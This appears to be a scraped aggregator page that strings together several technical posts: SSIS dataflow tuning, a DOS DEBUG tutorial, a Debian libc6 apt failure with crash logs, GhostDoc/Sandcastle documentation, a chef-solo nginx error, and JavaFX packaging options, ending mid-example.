that shows how CSPL Split by Month of Birth and salary category in the first dataflow is setup. Observe that there is a case for each combination of Month Of Date and Income Category – 24 in total. These expressions get evaluated in the order that they appear and hence if we assume that Month of Date and Income Category are uniformly distributed in the dataset we can deduce that the expected number of expression evaluations for each row is 12.5 i.e. 1 (the minimum) + 24 (the maximum) divided by 2 = 12.5. Now take a look at the screenshots for the second dataflow. We are doing one expression evaluation in DER Income Category and we have the same 24 cases in CSPL Split by Month of Birth and Income Category as we had before, only the expression differs slightly. In this case then we have 1 + 12.5 = 13.5 expected evaluations for each row – that would account for the slightly longer average execution time for this dataflow. Now onto the third dataflow, the quick one. CSPL Split by Income Category does a maximum of 2 expression evaluations thus the expected number of evaluations per row is 1.5. CSPL Split by Month of Birth 1 & CSPL Split by Month of Birth 2 both have less work to do than the previous Conditional Split components because they only have 12 cases to test for thus the expected number of expression evaluations is 6.5 There are two of them so total expected number of expression evaluations for this dataflow is 6.5 + 6.5 + 1.5 = 14.5. 14.5 is still more than 12.5 & 13.5 though so why is the third dataflow so much quicker? Simple, the conditional expressions in the first two dataflows have two boolean predicates to evaluate – one for Income Category and one for Month of Birth; the expressions in the Conditional Split in the third dataflow however only have one predicate thus they are doing a lot less work. To sum up, the difference in execution times can be attributed to the difference between: MONTH(BirthDate) == 1 && YearlyIncome <= 50000 and MONTH(BirthDate) == 1 In the first two dataflows YearlyIncome <= 50000 gets evaluated an average of 12.5 times for every row whereas in the third dataflow it is evaluated once and once only. Multiply those 11.5 extra operations by 4.7million rows and you get a significant amount of extra CPU cycles – that’s where our duration difference comes from. The Wrap-up The obvious point here is that adding new components to a dataflow isn’t necessarily going to make it go any slower, moreover you may be able to achieve significant improvements by splitting logic over multiple components rather than one. Performance tuning is all about reducing the amount of work that needs to be done and that doesn’t necessarily mean use less components, indeed sometimes you may be able to reduce workload in ways that aren’t immediately obvious as I think I have proven here. Of course there are many variables in play here and your mileage will most definitely vary. I encourage you to download the package and see if you get similar results – let me know in the comments. The package contains all three dataflows plus a fourth dataflow that will create the 2GB raw file for you (you will also need the [AdventureWorksDW2008] sample database from which to source the data); simply disable all dataflows except the one you want to test before executing the package and remember, execute using dtexec, not within BIDS. If you want to explore dataflow performance tuning in more detail then here are some links you might want to check out: Inequality joins, Asynchronous transformations and Lookups Destination Adapter Comparison Don’t turn the dataflow into a cursor SSIS Dataflow – Designing for performance (webinar) Any comments? Let me know! @Jamiet

    Read the article

  • The DOS DEBUG Environment

    - by MarkPearl
    Today I thought I would go back in time and have a look at the DEBUG command that has been available since the beginning of dawn in DOS, MS-DOS and Microsoft Windows. up to today I always knew it was there, but had no clue on how to use it so for those that are interested this might be a great geek party trick to pull out when you want the awe the younger generation and want to show them what “real” programming is about. But wait, you will have to do it relatively quickly as it seems like DEBUG was finally dumped from the Windows group in Windows 7. Not to worry, pull out that Windows XP box which will get you even more geek points and you can still poke DEBUG a bit. So, for those that are interested and want to find out a bit about the history of DEBUG read the wiki link here. That all put aside, lets get our hands dirty.. How to Start DEBUG in Windows Make sure your version of Windows supports DEBUG. Open up a console window Make a directory where you want to play with debug – in my instance I called it C221 Enter the directory and type Debug You will get a response with a – as illustrated in the image below…   The commands available in DEBUG There are several commands available in DEBUG. The most common ones are A (Assemble) R (Register) T (Trace) G (Go) D (Dump or Display) U (Unassemble) E (Enter) P (Proceed) N (Name) L (Load) W (Write) H (Hexadecimal) I (Input) O (Output) Q (Quit) I am not going to cover all these commands, but what I will do is go through a few of them briefly. A is for Assemble Command (to write code) The A command translates assembly language statements into machine code. It is quite useful for writing small assembly programs. Below I have written a very basic assembly program. The code typed out is as follows mov ax,0015 mov cx,0023 sub cx,ax mov [120],al mov cl,[120]A nop R is for Register (to jump to a point in memory) The r command turns out to be one of the most frequent commands you will use in DEBUG. It allows you to view the contents of registers and to change their values. It can be used with the following combinations… R – Displays the contents of all the registers R f – Displays the flags register R register_name – Displays the contents of a specific register All three methods are illustrated in the image above T is for Trace (To execute a program step by step) The t command allows us to execute the program step by step. Before we can trace the program we need to point back to the beginning of the program. We do this by typing in r ip, which moves us back to memory point 100. We then type trace which executes the first line of code (line 100) (As shown in the image below starting from the red arrow). You can see from the above image that the register AX now contains 0015 as per our instruction mov ax,0015 You can also see that the IP points to line 0103 which has the MOV CX,0023 command If we type t again it will now execute the second line of the program which moves 23 in the cx register. Again, we can see that the line of code was executed and that the CX register now holds the value of 23. What I would like to highlight now is the section underlined in red. These are the status flags. The ones we are going to look at now are 1st (NV), 4th (PL), 5th (NZ) & 8th (NC) NV means no overflow, the alternate would be OV PL means that the sign of the previous arithmetic operation was Plus, the alternate would be NG (Negative) NZ means that the results of the previous arithmetic operation operation was Not Zero, the alternate would be ZR NC means that No final Carry resulted from the previous arithmetic operation. CY means that there was a final Carry. We could now follow this process of entering the t command until the entire program is executed line by line. G is for Go (To execute a program up to a certain line number) So we have looked at executing a program line by line, which is fine if your program is minuscule BUT totally unpractical if we have any decent sized program. A quicker way to run some lines of code is to use the G command. The ‘g’ command executes a program up to a certain specified point. It can be used in connection with the the reset IP command. You would set your initial point and then run the G command with the line you want to end on. P is for Proceed (Similar to trace but slightly more streamlined) Another command similar to trace is the proceed command. All that the p command does is if it is called and it encounters a CALL, INT or LOOP command it terminates the program execution. In the example below I modified our example program to include an int 20 at the end of it as illustrated in the image below… Then when executing the code when I encountered the int 20 command I typed the P command and the program terminated normally (illustrated below). D is for Dump (or for those more polite Display) So, we have all these assembly lines of code, but if you have ever opened up an exe or com file in a text/hex editor, it looks nothing like assembly code. The D command is a way that we can see what our code looks like in memory (or in a hex editor). If we examined the image above, we can see that Debug is storing our assembly code with each instruction following immediately after the previous one. For instance in memory address 110 we have int and 111 we have 20. If we examine the dump of memory we can see at memory point 110 CD is stored and at memory point 111 20 is stored. U is for Unassemble (or Convert Machine code to Assembly Code) So up to now we have gone through a bunch of commands, but probably one of the most useful is the U command. Let’s say we don’t understand machine code so well and so instead we want to see it in its equivalent assembly code. We can type the U command followed by the start memory point, followed by the end memory point and it will show us the assembly code equivalent of the machine code. E is for a bunch of things… The E command can be used for a bunch of things… One example is to enter data or machine code instructions directly into memory. It can also be used to display the contents of memory locations. I am not going to worry to much about it in this post. N / L / W is for Name, Load & Write So we have written out assembly code in debug, and now we want to save it to disk, or write it as a com file or load it. This is where the N, L & W command come in handy. The n command is used to give a name to the executable program file and is pretty simple to use. The w command is a bit trickier. It saves to disk all the memory between point bx and point cx so you need to specify the bx memory address and the cx memory address for it to write your code. Let’s look at an example illustrated below. You do this by calling the r command followed by the either bx or cx. We can then go to the directory where we were working and will see the new file with the name we specified. The L command is relatively simple. You would first specify the name of the file you would like to load using the N command, and then call the L command. Q is for Quit The last command that I am going to write about in this post is the Q command. Simply put, calling the Q command exits DEBUG. Commands we did not Cover Out of the standard DEBUG commands we covered A, T, G, D, U, E, P, R, N, L & W. The ones we did not cover were H, I & O – I might make mention of these in a later post, but for the basics they are not really needed. Some Useful Resources Please note this post is based on the COS2213 handouts for UNISA A Guide to DEBUG - http://mirror.href.com/thestarman/asm/debug/debug.htm#NT

    Read the article

  • Debian apt dependency mismatch (libc6)

    - by Sean Gordon
    Earlier, I tried to install package via apt-get (cython), but it failed with the Errors were encountered while processing: message, and since then, apt is refusing to install anything. apt-get check output below: root@dix:~# apt-get check Reading package lists... Done Building dependency tree Reading state information... Done You might want to run 'apt-get -f install' to correct these. The following packages have unmet dependencies: libc6 : Depends: libc-bin (= 2.11.3-2) but 2.11.3-4 is installed libc6-dev : Depends: libc6 (= 2.11.3-4) but 2.11.3-2 is installed libc6-i386 : Depends: libc6 (= 2.11.3-4) but 2.11.3-2 is installed E: Unmet dependencies. Try using -f. Apt/aptitude don't seem to be able to fix this dependency issue, and I don't know what to do. Edit: Running apt-get -f install results in no change, and my sources are all squeeze. Running apt-get update then apt-get dist-upgrade show no change either. Edit 2: I went back to try this again in a new terminal and apt-get -f install gives this error: dpkg: error processing /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb (--unpack): subprocess new pre-installation script killed by signal (Aborted) configured to not write apport reports Errors were encountered while processing: /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb E: Sub-process /usr/bin/dpkg returned an error code (1) Edit 3: Using apt-get clean first, then the previous commands, results in the first error again. Using apt-get -f dist-upgrade gives the below. Reading package lists... Building dependency tree... Reading state information... Correcting dependencies... Done The following packages will be upgraded: apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common at automake base-files bind9 bind9-doc bind9-host bind9utils debian-archive-keyring dnsutils dpkg-dev file host initscripts isc-dhcp-client isc-dhcp-common krb5-multidev libapr1 libbind9-60 libc6 libdns69 libdpkg-perl libexpat1 libexpat1-dev libgc1c2 libgssapi-krb5-2 libgssrpc4 libisc62 libisccc60 libisccfg62 libk5crypto3 libkadm5clnt-mit7 libkadm5srv-mit7 libkdb5-4 libkrb5-3 libkrb5-dev libkrb5support0 liblwres60 libmagic1 libmysqlclient16 libnss3-1d libssl-dev libssl0.9.8 libtiff4 libtiff4-dev libtiffxx0c2 libxi6 libxml2 linux-libc-dev lwresd mysql-client-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssh-client openssh-server openssl procps python python-crypto python-minimal sudo sysv-rc sysvinit sysvinit-utils tzdata tzdata-java 75 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. 5 not fully installed or removed. Need to get 0 B/79.9 MB of archives. After this operation, 1,411 kB of additional disk space will be used. (Reading database ... 52241 files and directories currently installed.) Preparing to replace libc6 2.11.3-2 (using .../libc6_2.11.3-4_amd64.deb) ... *** stack smashing detected ***: /usr/bin/perl terminated ======= Backtrace: ========= /lib/libc.so.6(__fortify_fail+0x37)[0x7fdaad9b9f87] /lib/libc.so.6(__fortify_fail+0x0)[0x7fdaad9b9f50] /usr/lib/libperl.so.5.10(Perl_yylex+0x5896)[0x7fdaae343346] [0x8e83a0] ======= Memory map: ======== 00400000-00402000 r-xp 00000000 08:01 525338 /usr/bin/perl 00601000-00602000 rw-p 00001000 08:01 525338 /usr/bin/perl 00602000-0091f000 rw-p 00000000 00:00 0 [heap] 7fdaaca54000-7fdaaca6a000 r-xp 00000000 08:01 393818 /lib/libgcc_s.so.1 7fdaaca6a000-7fdaacc69000 ---p 00016000 08:01 393818 /lib/libgcc_s.so.1 7fdaacc69000-7fdaacc6a000 rw-p 00015000 08:01 393818 /lib/libgcc_s.so.1 7fdaacc6a000-7fdaacc6f000 r-xp 00000000 08:01 524949 /usr/lib/perl5/auto/Locale/gettext/gettext.so 7fdaacc6f000-7fdaace6e000 ---p 00005000 08:01 524949 /usr/lib/perl5/auto/Locale/gettext/gettext.so 7fdaace6e000-7fdaace6f000 rw-p 00004000 08:01 524949 /usr/lib/perl5/auto/Locale/gettext/gettext.so 7fdaace6f000-7fdaace79000 r-xp 00000000 08:01 532753 /usr/lib/perl/5.10.1/auto/Encode/Encode.so 7fdaace79000-7fdaad078000 ---p 0000a000 08:01 532753 /usr/lib/perl/5.10.1/auto/Encode/Encode.so 7fdaad078000-7fdaad079000 rw-p 00009000 08:01 532753 /usr/lib/perl/5.10.1/auto/Encode/Encode.so 7fdaad079000-7fdaad07e000 r-xp 00000000 08:01 525444 /usr/lib/perl/5.10.1/auto/IO/IO.so 7fdaad07e000-7fdaad27d000 ---p 00005000 08:01 525444 /usr/lib/perl/5.10.1/auto/IO/IO.so 7fdaad27d000-7fdaad27e000 rw-p 00004000 08:01 525444 /usr/lib/perl/5.10.1/auto/IO/IO.so 7fdaad27e000-7fdaad299000 r-xp 00000000 08:01 525450 /usr/lib/perl/5.10.1/auto/POSIX/POSIX.so 7fdaad299000-7fdaad498000 ---p 0001b000 08:01 525450 /usr/lib/perl/5.10.1/auto/POSIX/POSIX.so 7fdaad498000-7fdaad49b000 rw-p 0001a000 08:01 525450 /usr/lib/perl/5.10.1/auto/POSIX/POSIX.so 7fdaad49b000-7fdaad49e000 r-xp 00000000 08:01 525436 /usr/lib/perl/5.10.1/auto/Fcntl/Fcntl.so 7fdaad49e000-7fdaad69e000 ---p 00003000 08:01 525436 /usr/lib/perl/5.10.1/auto/Fcntl/Fcntl.so 7fdaad69e000-7fdaad69f000 rw-p 00003000 08:01 525436 /usr/lib/perl/5.10.1/auto/Fcntl/Fcntl.so 7fdaad69f000-7fdaad6a7000 r-xp 00000000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad6a7000-7fdaad8a6000 ---p 00008000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad8a6000-7fdaad8a7000 r--p 00007000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad8a7000-7fdaad8a8000 rw-p 00008000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad8a8000-7fdaad8d6000 rw-p 00000000 00:00 0 7fdaad8d6000-7fdaada2f000 r-xp 00000000 08:01 393822 /lib/libc-2.11.3.so 7fdaada2f000-7fdaadc2e000 ---p 00159000 08:01 393822 /lib/libc-2.11.3.so 7fdaadc2e000-7fdaadc32000 r--p 00158000 08:01 393822 /lib/libc-2.11.3.so 7fdaadc32000-7fdaadc33000 rw-p 0015c000 08:01 393822 /lib/libc-2.11.3.so 7fdaadc33000-7fdaadc38000 rw-p 00000000 00:00 0 7fdaadc38000-7fdaadc4f000 r-xp 00000000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaadc4f000-7fdaade4e000 ---p 00017000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaade4e000-7fdaade4f000 r--p 00016000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaade4f000-7fdaade50000 rw-p 00017000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaade50000-7fdaade54000 rw-p 00000000 00:00 0 7fdaade54000-7fdaaded4000 r-xp 00000000 08:01 393826 /lib/libm-2.11.3.so 7fdaaded4000-7fdaae0d4000 ---p 00080000 08:01 393826 /lib/libm-2.11.3.so 7fdaae0d4000-7fdaae0d5000 r--p 00080000 08:01 393826 /lib/libm-2.11.3.so 7fdaae0d5000-7fdaae0d6000 rw-p 00081000 08:01 393826 /lib/libm-2.11.3.so 7fdaae0d6000-7fdaae0d8000 r-xp 00000000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae0d8000-7fdaae2d8000 ---p 00002000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae2d8000-7fdaae2d9000 r--p 00002000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae2d9000-7fdaae2da000 rw-p 00003000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae2da000-7fdaae43f000 r-xp 00000000 08:01 525387 /usr/lib/libperl.so.5.10.1 7fdaae43f000-7fdaae63e000 ---p 00165000 08:01 525387 /usr/lib/libperl.so.5.10.1 7fdaae63e000-7fdaae647000 rw-p 00164000 08:01 525387 /usr/lib/libperl.so.5.10.1 7fdaae647000-7fdaae665000 r-xp 00000000 08:01 393819 /lib/ld-2.11.3.so 7fdaae854000-7fdaae859000 rw-p 00000000 00:00 0 7fdaae862000-7fdaae864000 rw-p 00000000 00:00 0 7fdaae864000-7fdaae865000 r--p 0001d000 08:01 393819 /lib/ld-2.11.3.so 7fdaae865000-7fdaae866000 rw-p 0001e000 08:01 393819 /lib/ld-2.11.3.so 7fdaae866000-7fdaae867000 rw-p 00000000 00:00 0 7fff9616d000-7fff9618e000 rw-p 00000000 00:00 0 [stack] 7fff961ff000-7fff96200000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r--p 00000000 00:00 0 [vsyscall] dpkg: error processing /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb (--unpack): subprocess new pre-installation script killed by signal (Aborted) Errors were encountered while processing: /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb

    Read the article

  • Documenting C# Library using GhostDoc and SandCastle

    - by sreejukg
    Documentation is an essential part of any IT project, especially when you are creating reusable components that will be used by other developers (such as class libraries). Without documentation re-using a class library is almost impossible. Just think of coding .net applications without MSDN documentation (Ooops I can’t think of it). Normally developers, who know the bits and pieces of their classes, see this as a boring work to write details again to generate the documentation. Also the amount of work to make this and manage it changes made the process of manual creation of Documentation impossible or tedious. So what is the effective solution? Let me divide this into two steps 1. Generate comments for your code while you are writing the code. 2. Create documentation file using these comments. Now I am going to examine these processes. Step 1: Generate XML Comments automatically Most of the developers write comments for their code. The best thing is that the comments will be entered during the development process. Additionally comments give a good reference to the code, make your code more manageable/readable. Later these comments can be converted into documentation, along with your source code by identifying properties and methods I found an add-in for visual studio, GhostDoc that automatically generates XML documentation comments for C#. The add-in is available in Visual Studio Gallery at MSDN. You can download this from the url http://visualstudiogallery.msdn.microsoft.com/en-us/46A20578-F0D5-4B1E-B55D-F001A6345748. I downloaded the free version from the above url. The free version suits my requirement. There is a professional version (you need to pay some $ for this) available that gives you some more features. I found the free version itself suits my requirements. The installation process is straight forward. A couple of clicks will do the work for you. The best thing with GhostDoc is that it supports multiple versions of visual studio such as 2005, 2008 and 2010. After Installing GhostDoc, when you start Visual studio, the GhostDoc configuration dialog will appear. The first screen asks you to assign a hot key, pressing this hotkey will enter the comment to your code file with the necessary structure required by GhostDoc. Click Assign to go to the next step where you configure the rules for generating the documentation from the code file. Click Create to start creating the rules. Click finish button to close this wizard. Now you performed the necessary configuration required by GhostDoc. Now In Visual Studio tools menu you can find the GhostDoc that gives you some options. Now let us examine how GhostDoc generate comments for a method. I have write the below code in my code behind file. public Char GetChar(string str, int pos) { return str[pos]; } Now I need to generate the comments for this function. Select the function and enter the hot key assigned during the configuration. GhostDoc will generate the comments as follows. /// <summary> /// Gets the char. /// </summary> /// <param name="str">The STR.</param> /// <param name="pos">The pos.</param> /// <returns></returns> public Char GetChar(string str, int pos) { return str[pos]; } So this is a very handy tool that helps developers writing comments easily. You can generate the xml documentation file separately while compiling the project. This will be done by the C# compiler. You can enable the xml documentation creation option (checkbox) under Project properties -> Build tab. Now when you compile, the xml file will created under the bin folder. Step 2: Generate the documentation from the XML file Now you have generated the xml file documentation. Sandcastle is the tool from Microsoft that generates MSDN style documentation from the compiler produced XML file. The project is available in codeplex http://sandcastle.codeplex.com/. Download and install Sandcastle to your computer. Sandcastle is a command line tool that doesn’t have a rich GUI. If you want to automate the documentation generation, definitely you will be using the command line tools. Since I want to generate the documentation from the xml file generated in the previous step, I was expecting a GUI where I can see the options. There is a GUI available for Sandcastle called Sandcastle Help File Builder. See the link to the project in codeplex. http://www.codeplex.com/wikipage?ProjectName=SHFB. You need to install Sandcastle and then the Sandcastle Help file builder. From here I assume that you have installed both sandcastle and Sandcastle help file builder successfully. Once you installed the help file builder, it will be available in your all programs list. Click on the Sandcastle Help File Builder GUI, will launch application. First you need to create a project. Click on File -> New project The New project dialog will appear. Choose a folder to store your project file and give a name for your documentation project. Click the save button. Now you will see your project properties. Now from the Project explorer, right click on the Documentation Sources, Click on the Add Documentation Source link. A documentation source is a file such as an assembly or a Visual Studio solution or project from which information will be extracted to produce API documentation. From the Add Documentation source dialog, I have selected the XML file generated by my project. Once you add the xml file to the project, you will see the dll file automatically added by the help file builder. Now click on the build button. Now the application will generate the help file. The Build window gives to the result of each steps. Once the process completed successfully, you will have the following output in the build window. Now navigate to your Help Project (I have selected the folder My Documents\Documentation), inside help folder, you can find the chm file. Open the chm file will give you MSDN like documentation. Documentation is an important part of development life cycle. Sandcastle with GhostDoc make this process easier so that developers can implement the documentation in the projects with simple to use steps.

    Read the article

  • Chef-solo cannot locate an nginx recipe template

    - by crftr
    I have been recently experimenting with Chef. I thought I would attempt to rebuild my personal web server using chef-solo. It's an AWS instance running the Amazon 64bit Linux AMI. My first objective is to install nginx. I have cloned the Opscode cookbook repository, and am using their nginx cookbook. My problem appears to be that chef-solo cannot find a template after it has started the process. The command I'm using is chef-solo -j /etc/chef/dna.json dna.json { "nginx": { "user": "ec2-user" }, "recipes": [ "nginx" ] } solo.rb file_cache_path "/var/chef-solo" cookbook_path "/var/chef-solo/cookbooks" ...the output [root@ip-10-202-221-135 chef-solo]# chef-solo -j /etc/chef/dna.json /usr/lib64/ruby/gems/1.9.1/gems/systemu-2.2.0/lib/systemu.rb:29: Use RbConfig instead of obsolete and deprecated Config. [Fri, 27 Jan 2012 19:41:36 +0000] INFO: *** Chef 0.10.8 *** [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Setting the run_list to ["nginx"] from JSON [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List is [recipe[nginx]] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List expands to [nginx] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Starting Chef Run for ip-10-202-221-135.ec2.internal [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Running start handlers [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Start handlers complete. [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Missing gem 'mysql' [Fri, 27 Jan 2012 19:41:38 +0000] INFO: Processing package[nginx] action install (nginx::default line 21) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing directory[/var/log/nginx] action create (nginx::default line 23) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxensite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxdissite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[nginx.conf] action create (nginx::default line 38) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/etc/nginx/sites-available/default] action create (nginx::default line 46) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: template[/etc/nginx/sites-available/default] mode changed to 644 [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (nginx::default line 46) has had an error [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (/var/chef-solo/cookbooks/nginx/recipes/default.rb:46:in `from_file') had an error: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `rename' /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `block in mv' /usr/lib64/ruby/1.9.1/fileutils.rb:1515:in `block in fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:1531:in `fu_each_src_dest0' /usr/lib64/ruby/1.9.1/fileutils.rb:1513:in `fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:508:in `mv' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:47:in `block in action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:48:in `block in render_template' /usr/lib64/ruby/1.9.1/tempfile.rb:316:in `open' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:45:in `render_template' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:99:in `render_with_context' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:39:in `action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource.rb:440:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:45:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block (2 levels) in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `each' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:94:in `block in execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call_iterator_block' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:85:in `step' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:104:in `iterate' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:55:in `each_with_index' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:92:in `execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:76:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:312:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:160:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:192:in `block in run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `loop' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application.rb:67:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/bin/chef-solo:25:in `<top (required)>' /usr/bin/chef-solo:19:in `load' /usr/bin/chef-solo:19:in `<main>' [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Running exception handlers [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Exception handlers complete [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Stacktrace dumped to /var/chef-solo/chef-stacktrace.out [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Errno::ENOENT: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) What am I doing incorrectly?

    Read the article

  • 7u10: JavaFX packaging tools update

    - by igor
    Last weeks were very busy here in Oracle. JavaOne 2012 is next week. Come to see us there! Meanwhile i'd like to quickly update you on recent developments in the area of packaging tools. This is an area of ongoing development for the team, and we are  continuing to refine and improve both the tools and the process. Thanks to everyone who shared experiences and suggestions with us. We are listening and fixed many of reported issues. Please keep them coming as comments on the blog or (even better) file issues directly to the JIRA. In this post i'll focus on several new packaging features added in JDK 7 update 10: Self-Contained Applications: Select Java Runtime to bundle Self-Contained Applications: Create Package without Java Runtime Self-Contained Applications: Package non-JavaFX application Option to disable proxy setup in the JavaFX launcher Ability to specify codebase for WebStart application Option to update existing jar file Self-Contained Applications: Specify application icon Self-Contained Applications: Pass parameters on the command line All these features and number of other important bug fixes are available in the developer preview builds of JDK 7 update 10 (build 8 or later). Please give them a try and share your feedback! Self-Contained Applications: Select Java Runtime to bundle Packager tools in 7u6 assume current JDK (based on java.home property) is the source for embedded runtime. This is useful simplification for many scenarios but there are cases where ability to specify what to embed explicitly is handy. For example IDE may be using fixed JDK to build the project and this is not the version you want to bundle into your application. To make it more flexible we now allow to specify location of base JDK explicitly. It is optional and if you do not specify it then current JDK will be used (i.e. this change is fully backward compatible). New 'basedir' attribute was added to <fx:platform> tag. Its value is location of JDK to be used. It is ok to point to either JRE inside the JDK or JDK top level folder. However, it must be JDK and not JRE as we need other JDK tools for proper packaging and it must be recent version of JDK that is bundled with JavaFX (i.e. Java 7 update 6 or later). Here are examples (<fx:platform> is part of <fx:deploy> task): <fx:platform basedir="${java.home}"/> <fx:platform basedir="c:\tools\jdk7"/> Hint: this feature enables you to use packaging tools from JDK 7 update 10 (and benefit from bug fixes and other features described below) to create application package with bundled FCS version of JRE 7 update 6. Self-Contained Applications: Create Package without Java Runtime This may sound a bit puzzling at first glance. Package without embedded Java Runtime is not really self-contained and obviously will not help with: Deployment on fresh systems. JRE need to be installed separately (and this step will require admin permissions). Possible compatibility issues due to updates of system runtime. However, these packages are much much smaller in size. If download size matters and you are confident that user have recommended system JRE installed then this may be good option to consider if you want to improve user experience for install and launch. Technically, this is implemented as an extension of previous feature. Pass empty string as value for 'basedir' attribute and this will be treated as request to not bundle Java runtime, e.g. <fx:platform basedir=""/> Self-Contained Applications: Package non-JavaFX application One of popular questions people ask about self-contained applications - can i package my Java application as self-contained application? Absolutely. This is true even for tools shipped with JDK 7 update 6. Simply follow steps for creating package for Swing application with integrated JavaFX content and they will work even if your application does not use JavaFX. What's wrong with it? Well, there are few caveats: bundle size is larger because JavaFX is bundled whilst it is not really needed main application jar needs to be packaged to comply to JavaFX packaging requirements(and this may be not trivial to achieve in your existing build scripts) javafx application launcher may not work well with startup logic of your application (for example launcher will initialize networking stack and this may void custom networking settings in your application code) In JDK 7 update 6 <fx:deploy> was updated to accept arbitrary executable jar as an input. Self-contained application package will be created preserving input jar as-is, i.e. no JavaFX launcher will be embedded. This does not help with first point above but resolves other two. More formally following assertions must be true for packaging to succeed: application can be launched as "java -jar YourApp.jar" from the command line  mainClass attribute of <fx:application> refers to application main class <fx:resources> lists all resources needed for the application To give you an example lets assume we need to create a bundle for application consisting of 3 jars:     dist/javamain.jar     dist/lib/somelib.jar    dist/morelibs/anotherlib.jar where javamain.jar has manifest with      Main-Class: app.Main     Class-Path: lib/somelib.jar morelibs/anotherlib.jar Here is sample ant code to package it: <target name="package-bundle"> <taskdef resource="com/sun/javafx/tools/ant/antlib.xml" uri="javafx:com.sun.javafx.tools.ant" classpath="${javafx.tools.ant.jar}"/> <fx:deploy nativeBundles="all" width="100" height="100" outdir="native-packages/" outfile="MyJavaApp"> <info title="Sample project" vendor="Me" description="Test 